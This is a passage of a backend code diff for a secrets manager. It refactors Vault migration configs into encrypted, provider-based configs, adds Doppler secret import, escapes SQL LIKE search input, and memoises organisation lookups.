requires an organization-level HashiCorp Vault app connection. Project-scoped app connections cannot be used." + }); + } + // Allow root namespace access when no namespace is configured on the connection const isRootAccess = namespace === "root" || namespace === "/"; const hasNoNamespace = connection.credentials.namespace === undefined; @@ -356,7 +387,11 @@ export const externalMigrationServiceFactory = ({ } }; - const createVaultExternalMigration = async ({ namespace, connectionId, actor }: TCreateVaultExternalMigrationDTO) => { + const createExternalMigration = async ({ + config: migrationConfig, + connectionId, + actor + }: TCreateExternalMigrationDTO) => { const { hasRole } = await permissionService.getOrgPermission({ actorId: actor.id, actor: actor.type, @@ -367,48 +402,68 @@ export const externalMigrationServiceFactory = ({ }); if (!hasRole(OrgMembershipRole.Admin)) { - throw new ForbiddenRequestError({ message: "Only admins can configure vault external migration" }); + throw new ForbiddenRequestError({ message: "Only admins can create external migration" }); } - const connection = await appConnectionService.connectAppConnectionById( - AppConnection.HCVault, - connectionId, - actor - ); - - await validateVaultExternalMigrationConnection({ - connection, - namespace + const existingConfigs = await externalMigrationConfigDAL.find({ + orgId: actor.orgId, + provider: migrationConfig.provider }); - try { - const config = await vaultExternalMigrationConfigDAL.create({ - namespace, - connectionId, - orgId: actor.orgId - }); + const { decryptor, encryptor } = await kmsService.createCipherPairWithDataKey({ + type: KmsDataKey.Organization, + orgId: actor.orgId + }); - return config; - } catch (error) { - if ( - error instanceof DatabaseError && - (error.error as { code: string })?.code === DatabaseErrorCode.UniqueViolation - ) { - throw new BadRequestError({ - message: `Vault external migration already exists for this namespace` + if (migrationConfig.provider === 
ExternalMigrationProviders.Vault) { + if (existingConfigs?.length) { + const parsedConfigs = existingConfigs.map((cfg) => { + const decryptedConfig = decryptor({ cipherTextBlob: cfg.encryptedConfig }); + return ExternalMigrationConfigVaultConfigSchema.parse(JSON.parse(decryptedConfig.toString())); }); + + if (parsedConfigs.some((cfg) => cfg.namespace === migrationConfig.config.namespace)) { + throw new BadRequestError({ message: "A Vault external migration already exists for this namespace" }); + } } - throw error; + const connection = await appConnectionService.connectAppConnectionById( + AppConnection.HCVault, + connectionId, + actor + ); + await validateVaultExternalMigrationConnection({ + connection, + namespace: migrationConfig.config.namespace + }); + } else if (migrationConfig.provider === ExternalMigrationProviders.Doppler) { + await appConnectionService.connectAppConnectionById(AppConnection.Doppler, connectionId, actor); + + if (existingConfigs?.length) { + if (existingConfigs.some((cfg) => cfg.connectionId === connectionId)) { + throw new BadRequestError({ + message: "A Doppler external migration already exists with the same app connection" + }); + } + } } + + const externalMigrationConfig = await externalMigrationConfigDAL.create({ + orgId: actor.orgId, + provider: migrationConfig.provider, + encryptedConfig: encryptor({ plainText: Buffer.from(JSON.stringify(migrationConfig.config)) }).cipherTextBlob, + connectionId + }); + + return externalMigrationConfig; }; - const updateVaultExternalMigration = async ({ + const updateExternalMigration = async ({ id, - namespace, + config: migrationConfig, connectionId, actor - }: TUpdateVaultExternalMigrationDTO) => { + }: TUpdateExternalMigrationDTO) => { const { hasRole } = await permissionService.getOrgPermission({ actorId: actor.id, actor: actor.type, @@ -419,39 +474,57 @@ export const externalMigrationServiceFactory = ({ }); if (!hasRole(OrgMembershipRole.Admin)) { - throw new ForbiddenRequestError({ message: 
"Only admins can update vault external migration" }); + throw new ForbiddenRequestError({ message: "Only admins can update external migration" }); } - const existingConfig = await vaultExternalMigrationConfigDAL.findById(id); - const configDoesNotExist = !existingConfig; - const configBelongsToDifferentOrg = existingConfig?.orgId !== actor.orgId; + const existing = await externalMigrationConfigDAL.findById(id); + if (!existing || existing.orgId !== actor.orgId) { + throw new NotFoundError({ message: "External migration config not found" }); + } - if (configDoesNotExist || configBelongsToDifferentOrg) { - throw new NotFoundError({ message: "Vault migration config not found" }); + if (existing.provider !== migrationConfig.provider) { + throw new BadRequestError({ message: "Cannot change provider of an existing migration config" }); } - if (connectionId) { - const connection = await appConnectionService.connectAppConnectionById( - AppConnection.HCVault, - connectionId, - actor - ); + const { encryptor } = await kmsService.createCipherPairWithDataKey({ + type: KmsDataKey.Organization, + orgId: actor.orgId + }); - await validateVaultExternalMigrationConnection({ - connection, - namespace - }); + if (migrationConfig.provider === ExternalMigrationProviders.Vault) { + if (connectionId) { + const connection = await appConnectionService.connectAppConnectionById( + AppConnection.HCVault, + connectionId, + actor + ); + + await validateVaultExternalMigrationConnection({ + connection, + namespace: migrationConfig.config.namespace + }); + } + } else if (migrationConfig.provider === ExternalMigrationProviders.Doppler) { + if (connectionId) { + await appConnectionService.connectAppConnectionById(AppConnection.Doppler, connectionId, actor); + } } - const config = await vaultExternalMigrationConfigDAL.updateById(id, { - namespace, + const updatedConfig = await externalMigrationConfigDAL.updateById(id, { + encryptedConfig: encryptor({ plainText: 
Buffer.from(JSON.stringify(migrationConfig.config)) }).cipherTextBlob, connectionId }); - return config; + return updatedConfig; }; - const getVaultExternalMigrationConfigs = async ({ actor }: { actor: OrgServiceActor }) => { + const getExternalMigrationConfigs = async ({ + actor, + provider + }: { + actor: OrgServiceActor; + provider: ExternalMigrationProviders; + }) => { const { hasRole } = await permissionService.getOrgPermission({ actorId: actor.id, actor: actor.type, @@ -462,14 +535,13 @@ export const externalMigrationServiceFactory = ({ }); if (!hasRole(OrgMembershipRole.Admin)) { - throw new ForbiddenRequestError({ message: "Only admins can view vault external migration configs" }); + throw new ForbiddenRequestError({ message: "Only admins can view external migration configs" }); } - const configs = await vaultExternalMigrationConfigDAL.find({ - orgId: actor.orgId + return externalMigrationConfigDAL.findWithConnection({ + orgId: actor.orgId, + provider }); - - return configs; }; const getVaultNamespaces = async ({ actor }: { actor: OrgServiceActor }) => { @@ -487,16 +559,28 @@ export const externalMigrationServiceFactory = ({ } // Get all configured namespaces for this org - const vaultConfigs = await vaultExternalMigrationConfigDAL.find({ + const vaultConfigs = await externalMigrationConfigDAL.find({ + orgId: actor.orgId, + provider: ExternalMigrationProviders.Vault + }); + + const { decryptor } = await kmsService.createCipherPairWithDataKey({ + type: KmsDataKey.Organization, orgId: actor.orgId }); // Return the configured namespaces as an array of objects with id and name // where both id and name are the namespace path - const namespaces = vaultConfigs.map((config) => ({ - id: config.namespace, - name: config.namespace - })); + const namespaces = vaultConfigs.map((config) => { + const decryptedConfig = decryptor({ cipherTextBlob: config.encryptedConfig }); + + const parsedConfig = 
ExternalMigrationConfigVaultConfigSchema.parse(JSON.parse(decryptedConfig.toString())); + + return { + id: parsedConfig.namespace, + name: parsedConfig.namespace + }; + }); return namespaces; }; @@ -539,7 +623,7 @@ export const externalMigrationServiceFactory = ({ environment, secretPath, vaultNamespace, - vaultSecretPath, + vaultSecretPaths, auditLogInfo }: { actor: OrgServiceActor; @@ -547,18 +631,54 @@ export const externalMigrationServiceFactory = ({ environment: string; secretPath: string; vaultNamespace: string; - vaultSecretPath: string; + vaultSecretPaths: string[]; auditLogInfo: AuditLogInfo; }) => { const connection = await getVaultConnectionForNamespace(actor, vaultNamespace, "import vault secrets"); - const vaultSecrets = await getHCVaultSecretsForPath( + + if (!vaultSecretPaths.length) { + throw new BadRequestError({ message: "At least one Vault secret path is required" }); + } + + const uniqueVaultSecretPaths = Array.from(new Set(vaultSecretPaths)); + + const secretsPerPath = await getHCVaultSecretsForPaths( vaultNamespace, - vaultSecretPath, + uniqueVaultSecretPaths, connection, gatewayService, gatewayV2Service ); + const keyOrigins = new Map(); + + // build a map of secret keys to the paths they appear in + for (const { vaultSecretPath, secrets } of secretsPerPath) { + for (const secretKey of Object.keys(secrets)) { + const paths = keyOrigins.get(secretKey); + if (paths) { + paths.push(vaultSecretPath); + } else { + keyOrigins.set(secretKey, [vaultSecretPath]); + } + } + } + + const conflicts = [...keyOrigins.entries()] + .filter(([, paths]) => paths.length > 1) + .map(([secretKey, paths]) => `"${secretKey}" (in ${paths.join(", ")})`); + + if (conflicts.length) { + throw new BadRequestError({ + message: `Cannot import: the following secret keys appear in multiple selected Vault paths: ${conflicts.join("; ")}. 
Resolve the conflicts in Vault or import the paths separately.` + }); + } + + const vaultSecrets: Record = {}; + for (const { secrets } of secretsPerPath) { + Object.assign(vaultSecrets, secrets); + } + try { const secretOperation = await secretService.createManySecretsRaw({ actorId: actor.id, @@ -594,10 +714,10 @@ export const externalMigrationServiceFactory = ({ } }); - return { status: VaultImportStatus.ApprovalRequired }; + return { status: ExternalMigrationImportStatus.ApprovalRequired }; } - return { status: VaultImportStatus.Imported }; + return { status: ExternalMigrationImportStatus.Imported }; } catch (error) { throw new BadRequestError({ message: `Failed to import Vault secrets. ${error instanceof Error ? error.message : "Unknown error"}` @@ -605,7 +725,7 @@ export const externalMigrationServiceFactory = ({ } }; - const deleteVaultExternalMigration = async ({ id, actor }: TDeleteVaultExternalMigrationDTO) => { + const deleteExternalMigration = async ({ id, actor }: TDeleteExternalMigrationDTO) => { const { hasRole } = await permissionService.getOrgPermission({ actorId: actor.id, actor: actor.type, @@ -616,22 +736,16 @@ export const externalMigrationServiceFactory = ({ }); if (!hasRole(OrgMembershipRole.Admin)) { - throw new ForbiddenRequestError({ message: "Only admins can delete vault external migration configs" }); + throw new ForbiddenRequestError({ message: "Only admins can delete external migration configs" }); } - const config = await vaultExternalMigrationConfigDAL.findById(id); + const config = await externalMigrationConfigDAL.findById(id); - if (!config) { - throw new NotFoundError({ message: "Vault migration config not found" }); + if (!config || config.orgId !== actor.orgId) { + throw new NotFoundError({ message: "External migration config not found" }); } - if (config.orgId !== actor.orgId) { - throw new ForbiddenRequestError({ message: "Config does not belong to this organization" }); - } - - const deletedConfig = await 
vaultExternalMigrationConfigDAL.deleteById(id); - - return deletedConfig; + return externalMigrationConfigDAL.deleteById(id); }; const getVaultAuthMounts = async ({ @@ -699,14 +813,142 @@ export const externalMigrationServiceFactory = ({ return getHCVaultLdapRoles(namespace, mountPath, connection, gatewayService, gatewayV2Service); }; + // ─── Doppler In-Platform Migration ────────────────────────────────────────── + + const getDopplerConnectionForConfig = async (configId: string, actor: OrgServiceActor) => { + const { hasRole } = await permissionService.getOrgPermission({ + scope: OrganizationActionScope.Any, + actor: actor.type, + actorId: actor.id, + orgId: actor.orgId, + actorAuthMethod: actor.authMethod, + actorOrgId: actor.orgId + }); + + if (!hasRole(OrgMembershipRole.Admin)) { + throw new ForbiddenRequestError({ message: "Only admins can use Doppler migration" }); + } + + const config = await externalMigrationConfigDAL.findById(configId); + + if (!config || config.orgId !== actor.orgId || config.provider !== ExternalMigrationProviders.Doppler) { + throw new NotFoundError({ message: "Doppler migration config not found" }); + } + + if (!config.connectionId) { + throw new BadRequestError({ message: "Doppler migration config has no connection configured" }); + } + + const appConnection = await appConnectionService.connectAppConnectionById( + AppConnection.Doppler, + config.connectionId, + actor + ); + + return appConnection; + }; + + const getDopplerProjects = async ({ configId, actor }: { configId: string; actor: OrgServiceActor }) => { + const appConnection = await getDopplerConnectionForConfig(configId, actor); + return listDopplerProjects(appConnection); + }; + + const getDopplerEnvironments = async ({ + configId, + projectSlug, + actor + }: { + configId: string; + projectSlug: string; + actor: OrgServiceActor; + }) => { + const appConnection = await getDopplerConnectionForConfig(configId, actor); + return listDopplerEnvironments(appConnection, 
projectSlug); + }; + + const getDopplerConfigs = async ({ + configId, + projectSlug, + actor + }: { + configId: string; + projectSlug: string; + actor: OrgServiceActor; + }) => { + const appConnection = await getDopplerConnectionForConfig(configId, actor); + return listDopplerConfigs(appConnection, projectSlug); + }; + + const importDopplerSecrets = async ({ + configId, + dopplerProject, + dopplerEnvironment, + targetProjectId, + targetEnvironment, + targetSecretPath, + actor, + auditLogInfo + }: TImportDopplerSecretsDTO) => { + const appConnection = await getDopplerConnectionForConfig(configId, actor); + + const dopplerSecrets = await getDopplerSecrets(appConnection, dopplerProject, dopplerEnvironment); + + try { + const secretOperation = await secretService.createManySecretsRaw({ + actorId: actor.id, + actor: actor.type, + actorAuthMethod: actor.authMethod, + actorOrgId: actor.orgId, + projectId: targetProjectId, + environment: targetEnvironment, + secretPath: targetSecretPath, + secrets: Object.entries(dopplerSecrets).map(([secretKey, secretValue]) => ({ + secretKey, + secretValue + })) + }); + + if (secretOperation.type === SecretProtectionType.Approval) { + await auditLogService.createAuditLog({ + projectId: targetProjectId, + ...auditLogInfo, + event: { + type: EventType.SECRET_APPROVAL_REQUEST, + metadata: { + committedBy: secretOperation.approval.committerUserId, + secretApprovalRequestId: secretOperation.approval.id, + secretApprovalRequestSlug: secretOperation.approval.slug, + secretPath: targetSecretPath, + environment: targetEnvironment, + secrets: Object.entries(dopplerSecrets).map(([secretKey]) => ({ + secretKey + })), + eventType: SecretApprovalEvent.CreateMany + } + } + }); + + return { status: ExternalMigrationImportStatus.ApprovalRequired, imported: 0 }; + } + } catch (error) { + throw new BadRequestError({ + message: `Failed to import Doppler secrets. ${error instanceof Error ? 
error.message : "Unknown error"}` + }); + } + + return { status: ExternalMigrationImportStatus.Imported, imported: Object.keys(dopplerSecrets).length }; + }; + return { importEnvKeyData, importVaultData, hasCustomVaultMigration, - createVaultExternalMigration, - getVaultExternalMigrationConfigs, - updateVaultExternalMigration, - deleteVaultExternalMigration, + + createExternalMigration, + updateExternalMigration, + deleteExternalMigration, + getExternalMigrationConfigs, + getVaultNamespaces, getVaultPolicies, getVaultMounts, @@ -716,6 +958,11 @@ export const externalMigrationServiceFactory = ({ getVaultKubernetesAuthRoles, getVaultKubernetesRoles, getVaultDatabaseRoles, - getVaultLdapRoles + getVaultLdapRoles, + + getDopplerProjects, + getDopplerEnvironments, + getDopplerConfigs, + importDopplerSecrets }; }; diff --git a/backend/src/services/external-migration/external-migration-types.ts b/backend/src/services/external-migration/external-migration-types.ts index 2b9069b9194..fd3dbfcf455 100644 --- a/backend/src/services/external-migration/external-migration-types.ts +++ b/backend/src/services/external-migration/external-migration-types.ts @@ -1,6 +1,8 @@ +import { AuditLogInfo } from "@app/ee/services/audit-log/audit-log-types"; import { OrgServiceActor, TOrgPermission } from "@app/lib/types"; import { ActorAuthMethod, ActorType } from "../auth/auth-type"; +import { ExternalMigrationProviders, TExternalMigrationConfig } from "./external-migration-schemas"; export enum KvVersion { V1 = "1", @@ -119,19 +121,42 @@ export type TEnvKeyExportJSON = { export enum ExternalPlatforms { EnvKey = "EnvKey", - Vault = "Vault" + Vault = "Vault", + Doppler = "Doppler" } -export enum ExternalMigrationProviders { - Vault = "vault", - EnvKey = "env-key" -} - -export enum VaultImportStatus { +export enum ExternalMigrationImportStatus { Imported = "imported", ApprovalRequired = "approval-required" } +export type TCreateDopplerExternalMigrationDTO = { + connectionId: string; + actor: 
OrgServiceActor; +}; + +export type TUpdateDopplerExternalMigrationDTO = { + id: string; + connectionId: string | null; + actor: OrgServiceActor; +}; + +export type TDeleteDopplerExternalMigrationDTO = { + id: string; + actor: OrgServiceActor; +}; + +export type TImportDopplerSecretsDTO = { + configId: string; + dopplerProject: string; + dopplerEnvironment: string; + targetProjectId: string; + targetEnvironment: string; + targetSecretPath: string; + actor: OrgServiceActor; + auditLogInfo: AuditLogInfo; +}; + export type TCreateVaultExternalMigrationDTO = { namespace: string; connectionId: string; @@ -145,7 +170,20 @@ export type TUpdateVaultExternalMigrationDTO = { actor: OrgServiceActor; }; -export type TDeleteVaultExternalMigrationDTO = { +export type TCreateExternalMigrationDTO = { + config: TExternalMigrationConfig; + connectionId: string; + actor: OrgServiceActor; +}; + +export type TUpdateExternalMigrationDTO = { + id: string; + config: TExternalMigrationConfig; + connectionId: string | null; + actor: OrgServiceActor; +}; + +export type TDeleteExternalMigrationDTO = { id: string; actor: OrgServiceActor; }; diff --git a/backend/src/services/external-migration/vault-external-migration-config-dal.ts b/backend/src/services/external-migration/vault-external-migration-config-dal.ts deleted file mode 100644 index 453432b6ed5..00000000000 --- a/backend/src/services/external-migration/vault-external-migration-config-dal.ts +++ /dev/null @@ -1,69 +0,0 @@ -import { Knex } from "knex"; - -import { TDbClient } from "@app/db"; -import { TableName } from "@app/db/schemas"; -import { DatabaseError } from "@app/lib/errors"; -import { buildFindFilter, ormify, prependTableNameToFindFilter, selectAllTableCols } from "@app/lib/knex"; - -export type TVaultExternalMigrationConfigDALFactory = ReturnType; - -export const vaultExternalMigrationConfigDALFactory = (db: TDbClient) => { - const orm = ormify(db, TableName.VaultExternalMigrationConfig); - - const findOne = async (filter: { 
orgId: string; namespace: string }, tx?: Knex) => { - try { - const result = await (tx || db?.replicaNode?.() || db)(TableName.VaultExternalMigrationConfig) - .leftJoin( - TableName.AppConnection, - `${TableName.AppConnection}.id`, - `${TableName.VaultExternalMigrationConfig}.connectionId` - ) - /* eslint-disable @typescript-eslint/no-misused-promises */ - .where(buildFindFilter(prependTableNameToFindFilter(TableName.VaultExternalMigrationConfig, filter))) - .select(selectAllTableCols(TableName.VaultExternalMigrationConfig)) - .select( - db.ref("id").withSchema(TableName.AppConnection).as("appConnectionId"), - db.ref("name").withSchema(TableName.AppConnection).as("appConnectionName"), - db.ref("app").withSchema(TableName.AppConnection).as("appConnectionApp"), - db.ref("encryptedCredentials").withSchema(TableName.AppConnection).as("appConnectionEncryptedCredentials"), - db.ref("orgId").withSchema(TableName.AppConnection).as("appConnectionOrgId"), - db.ref("isAutoRotationEnabled").withSchema(TableName.AppConnection).as("appConnectionIsAutoRotationEnabled"), - db.ref("method").withSchema(TableName.AppConnection).as("appConnectionMethod"), - db.ref("description").withSchema(TableName.AppConnection).as("appConnectionDescription"), - db.ref("version").withSchema(TableName.AppConnection).as("appConnectionVersion"), - db.ref("gatewayId").withSchema(TableName.AppConnection).as("appConnectionGatewayId"), - db.ref("projectId").withSchema(TableName.AppConnection).as("appConnectionProjectId"), - db.ref("createdAt").withSchema(TableName.AppConnection).as("appConnectionCreatedAt"), - db.ref("updatedAt").withSchema(TableName.AppConnection).as("appConnectionUpdatedAt") - ) - .first(); - - if (!result) return undefined; - - return { - ...result, - connection: result.appConnectionId - ? 
{ - id: result.appConnectionId, - name: result.appConnectionName, - app: result.appConnectionApp, - encryptedCredentials: result.appConnectionEncryptedCredentials, - orgId: result.appConnectionOrgId, - method: result.appConnectionMethod, - description: result.appConnectionDescription, - version: result.appConnectionVersion, - gatewayId: result.appConnectionGatewayId, - projectId: result.appConnectionProjectId, - createdAt: result.appConnectionCreatedAt, - updatedAt: result.appConnectionUpdatedAt, - isAutoRotationEnabled: result.appConnectionIsAutoRotationEnabled - } - : undefined - }; - } catch (error) { - throw new DatabaseError({ error, name: "Find one" }); - } - }; - - return { ...orm, findOne }; -}; diff --git a/backend/src/services/folder-commit/folder-commit-dal.ts b/backend/src/services/folder-commit/folder-commit-dal.ts index e95dbb83938..8f900ec81d8 100644 --- a/backend/src/services/folder-commit/folder-commit-dal.ts +++ b/backend/src/services/folder-commit/folder-commit-dal.ts @@ -10,6 +10,7 @@ import { TSecretVersionsV2 } from "@app/db/schemas"; import { DatabaseError, NotFoundError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { buildFindFilter, ormify, selectAllTableCols } from "@app/lib/knex"; export type TFolderCommitDALFactory = ReturnType; @@ -426,7 +427,7 @@ export const folderCommitDALFactory = (db: TDbClient) => { // Add search functionality if (search) { baseQuery = baseQuery.where((qb) => { - void qb.whereILike("message", `%${search}%`); + void qb.whereILike("message", `%${sanitizeSqlLikeString(search)}%`); }); } diff --git a/backend/src/services/group-project/group-project-service.ts b/backend/src/services/group-project/group-project-service.ts index 77497a26cd1..ac914796a54 100644 --- a/backend/src/services/group-project/group-project-service.ts +++ b/backend/src/services/group-project/group-project-service.ts @@ -4,24 +4,17 @@ import { ActionProjectType } from "@app/db/schemas"; import { 
TListProjectGroupUsersDTO } from "@app/ee/services/group/group-types"; import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; import { ProjectPermissionGroupActions, ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; -import { NotFoundError } from "@app/lib/errors"; import { TGroupDALFactory } from "../../ee/services/group/group-dal"; -import { TProjectDALFactory } from "../project/project-dal"; type TGroupProjectServiceFactoryDep = { groupDAL: Pick; - projectDAL: Pick; permissionService: Pick; }; export type TGroupProjectServiceFactory = ReturnType; -export const groupProjectServiceFactory = ({ - groupDAL, - projectDAL, - permissionService -}: TGroupProjectServiceFactoryDep) => { +export const groupProjectServiceFactory = ({ groupDAL, permissionService }: TGroupProjectServiceFactoryDep) => { const listProjectGroupUsers = async ({ id, projectId, @@ -35,12 +28,6 @@ export const groupProjectServiceFactory = ({ search, filter }: TListProjectGroupUsersDTO) => { - const project = await projectDAL.findById(projectId); - - if (!project) { - throw new NotFoundError({ message: `Failed to find project with ID ${projectId}` }); - } - const { permission } = await permissionService.getProjectPermission({ actor, actorId, @@ -51,8 +38,10 @@ export const groupProjectServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionGroupActions.Read, ProjectPermissionSub.Groups); + // getProjectPermission above throws NotFoundError if the project doesn't exist and + // guarantees actorOrgId === project.orgId β€” no separate project lookup needed. 
const { members, totalCount } = await groupDAL.findAllGroupPossibleUsers({ - orgId: project.orgId, + orgId: actorOrgId, groupId: id, offset, limit, diff --git a/backend/src/services/identity-access-token/identity-access-token-dal.ts b/backend/src/services/identity-access-token/identity-access-token-dal.ts index 39ba33f3d53..40a35f60e52 100644 --- a/backend/src/services/identity-access-token/identity-access-token-dal.ts +++ b/backend/src/services/identity-access-token/identity-access-token-dal.ts @@ -92,8 +92,7 @@ export const identityAccessTokenDALFactory = (db: TDbClient) => { // the query, you need to update the indexes accordingly to avoid performance regressions. return dbClient .select("id") - .from(revokedTokensQuery.unionAll(exceededUsageLimitQuery).unionAll(expiredTTLQuery).as("all_expired_tokens")) - .distinct(); + .from(revokedTokensQuery.unionAll(exceededUsageLimitQuery).unionAll(expiredTTLQuery).as("all_expired_tokens")); }; do { diff --git a/backend/src/services/identity-alicloud-auth/identity-alicloud-auth-service.ts b/backend/src/services/identity-alicloud-auth/identity-alicloud-auth-service.ts index f06551a3a50..3d91a60f467 100644 --- a/backend/src/services/identity-alicloud-auth/identity-alicloud-auth-service.ts +++ b/backend/src/services/identity-alicloud-auth/identity-alicloud-auth-service.ts @@ -24,7 +24,9 @@ import { } from "@app/lib/errors"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { ActorType, AuthTokenType } from "../auth/auth-type"; @@ -83,7 +85,9 @@ export const identityAliCloudAuthServiceFactory = ({ message: "Identity not found" 
}); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); // If the identity is a sub-org identity, then the scope is always the org.id, and if it's a root org identity, then we need to resolve the scope if a organizationSlug is specified @@ -537,7 +541,10 @@ export const identityAliCloudAuthServiceFactory = ({ actorOrgId }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.RevokeAuth, diff --git a/backend/src/services/identity-aws-auth/identity-aws-auth-service.ts b/backend/src/services/identity-aws-auth/identity-aws-auth-service.ts index b77b94be346..fabb3ec7138 100644 --- a/backend/src/services/identity-aws-auth/identity-aws-auth-service.ts +++ b/backend/src/services/identity-aws-auth/identity-aws-auth-service.ts @@ -2,7 +2,6 @@ import { ForbiddenError, subject } from "@casl/ability"; import { requestContext } from "@fastify/request-context"; /* eslint-disable @typescript-eslint/no-unsafe-assignment */ -import axios from "axios"; import RE2 from "re2"; import { AccessScope, ActionProjectType, IdentityAuthMethod, OrganizationActionScope } from "@app/db/schemas"; @@ -15,6 +14,7 @@ import { import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; import { ProjectPermissionIdentityActions, ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; import { getConfig } from "@app/lib/config/env"; +import { request } from "@app/lib/config/request"; import { crypto } from 
"@app/lib/crypto"; import { BadRequestError, @@ -25,7 +25,9 @@ import { } from "@app/lib/errors"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { ActorType, AuthTokenType } from "../auth/auth-type"; @@ -67,7 +69,7 @@ const awsRegionFromHeader = (authorizationHeader: string): string | null => { // SignedHeaders=content-length;content-type;host;x-amz-date, // Signature=fe5f80f77d5fa3beca038a248ff027d0445342fe2855ddc963176630326f1024 // - // The credential is in the form of "////aws4_request" + // The credential is in the form of "////aws4_request"xi try { const fields = authorizationHeader.split(" "); for (const field of fields) { @@ -121,7 +123,9 @@ export const identityAwsAuthServiceFactory = ({ message: "Identity not found" }); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); // If the identity is a sub-org identity, then the scope is always the org.id, and if it's a root org identity, then we need to resolve the scope if a organizationSlug is specified @@ -146,7 +150,7 @@ export const identityAwsAuthServiceFactory = ({ GetCallerIdentityResult: { Account, Arn, UserId } } } - }: { data: TGetCallerIdentityResponse } = await axios({ + }: { data: TGetCallerIdentityResponse } = await request({ method: iamHttpRequestMethod, url, headers, @@ -642,7 +646,10 @@ export const identityAwsAuthServiceFactory = ({ actorOrgId }); - const { shouldUseNewPrivilegeSystem } = await 
orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.RevokeAuth, diff --git a/backend/src/services/identity-azure-auth/identity-azure-auth-fns.ts b/backend/src/services/identity-azure-auth/identity-azure-auth-fns.ts index cb06f3d4058..636b6d92e4c 100644 --- a/backend/src/services/identity-azure-auth/identity-azure-auth-fns.ts +++ b/backend/src/services/identity-azure-auth/identity-azure-auth-fns.ts @@ -1,5 +1,4 @@ -import axios from "axios"; - +import { request } from "@app/lib/config/request"; import { crypto } from "@app/lib/crypto"; import { UnauthorizedError } from "@app/lib/errors"; @@ -20,7 +19,7 @@ export const validateAzureIdentity = async ({ const { kid } = decodedJwt.header; - const { data }: { data: TAzureJwksUriResponse } = await axios.get(jwksUri); + const { data }: { data: TAzureJwksUriResponse } = await request.get(jwksUri); const signingKeys = data.keys; const signingKey = signingKeys.find((key) => key.kid === kid); diff --git a/backend/src/services/identity-azure-auth/identity-azure-auth-service.ts b/backend/src/services/identity-azure-auth/identity-azure-auth-service.ts index 03acd0f43a6..90e4c36bade 100644 --- a/backend/src/services/identity-azure-auth/identity-azure-auth-service.ts +++ b/backend/src/services/identity-azure-auth/identity-azure-auth-service.ts @@ -20,7 +20,9 @@ import { UnauthorizedError } from "@app/lib/errors"; import { extractIPDetails, isValidIpOrCidr } from "@app/lib/ip"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; import { RequestContextKey } from "@app/lib/request-context/request-context-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { 
AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { ActorType, AuthTokenType } from "../auth/auth-type"; @@ -77,7 +79,9 @@ export const identityAzureAuthServiceFactory = ({ message: "Identity not found" }); - const org = await orgDAL.findById(identity.orgId); + const org = await requestMemoize(requestMemoKeys.orgFindById(identity.orgId), () => + orgDAL.findById(identity.orgId) + ); const isSubOrgIdentity = Boolean(org.rootOrgId); // If the identity is a sub-org identity, then the scope is always the org.id, and if it's a root org identity, then we need to resolve the scope if a organizationSlug is specified @@ -543,7 +547,10 @@ export const identityAzureAuthServiceFactory = ({ actorAuthMethod, actorOrgId }); - const { shouldUseNewPrivilegeSystem } = await orgDAL.findById(identityMembershipOrg.scopeOrgId); + const { shouldUseNewPrivilegeSystem } = await requestMemoize( + requestMemoKeys.orgFindById(identityMembershipOrg.scopeOrgId), + () => orgDAL.findById(identityMembershipOrg.scopeOrgId) + ); const permissionBoundary = validatePrivilegeChangeOperation( shouldUseNewPrivilegeSystem, OrgPermissionIdentityActions.RevokeAuth, diff --git a/backend/src/services/identity-gcp-auth/identity-gcp-auth-fns.ts b/backend/src/services/identity-gcp-auth/identity-gcp-auth-fns.ts index 958a54e0ab5..48641586088 100644 --- a/backend/src/services/identity-gcp-auth/identity-gcp-auth-fns.ts +++ b/backend/src/services/identity-gcp-auth/identity-gcp-auth-fns.ts @@ -1,7 +1,7 @@ -import axios from "axios"; import { OAuth2Client } from "google-auth-library"; import RE2 from "re2"; +import { request } from "@app/lib/config/request"; import { crypto } from "@app/lib/crypto"; import { UnauthorizedError } from "@app/lib/errors"; @@ -64,7 +64,7 @@ export const validateIamIdentity = async ({ data: { [key: string]: string; }; - } = await axios.get(`https://www.googleapis.com/service_accounts/v1/metadata/x509/${encodeURIComponent(sub)}`); + } 
